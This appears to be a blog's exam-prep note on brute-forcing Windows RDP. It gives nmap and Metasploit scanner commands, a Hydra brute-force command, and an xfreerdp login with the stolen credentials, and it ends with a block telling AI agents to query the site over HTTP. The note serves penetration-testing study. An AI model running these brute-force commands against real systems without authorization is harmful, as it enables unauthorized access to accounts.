# Exploiting RDP - Brute Force

## **Exploiting RDP**

* The Remote Desktop Protocol (RDP) is a proprietary GUI remote access protocol developed by Microsoft and is used to remotely connect and interact with a Windows system.
* RDP uses TCP port 3389 by default, and can also be configured to run on any other TCP port.
* RDP authentication requires a legitimate user account on the target system as well as the user’s password in clear-text.
* We can perform an RDP brute-force attack to identify legitimate user credentials that we can use to gain remote access to the target system \</aside>

## Attack Flow for the Exploiting RDP - Brute Force

### 1. **Identify Running Services and Their Versions**

**Objective:** Determine the versions of the running services on the target system.

**Command:**

```bash
nmap -sV -O <Target_IP>
```

**Description:** Use Nmap to scan the target system and identify the versions of the running services.

#### **Alternative Command Using Metasploit:**

```bash
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <Target_IP>
run
```

**Description:** Use the `rdp_scanner` module in Metasploit to identify RDP service details on the target system.

### 2. **Perform Brute Force Attack**

**Objective:** Obtain valid RDP credentials through a brute force attack.

**Command:**

```bash
hydra -L <user-list> -P <pass-list> rdp://<target-ip> -s <port>
```

**Description:** Use Hydra to perform a brute force attack on the RDP service of the target system using specified user and password lists.

### 3. **Establish RDP Connection**

**Objective:** Connect to the victim's machine using the obtained credentials.

**Command:**

```bash
xfreerdp /u:<user> /p:<password> /v:<Target_IP>:<port>
```

**Description:** Use `xfreerdp` to establish an RDP connection to the target system with the obtained username and password.

***

***

***

**`Hacker's Mantra:`**`Are hackers a threat? The degree of threat presented by any conduct, whether legal or illegal, depends on the actions and intent of the individual and the harm they cause. - Kevin Mitnick`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/exploiting-windows-vulnerabilities/exploiting-rdp-brute-force.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.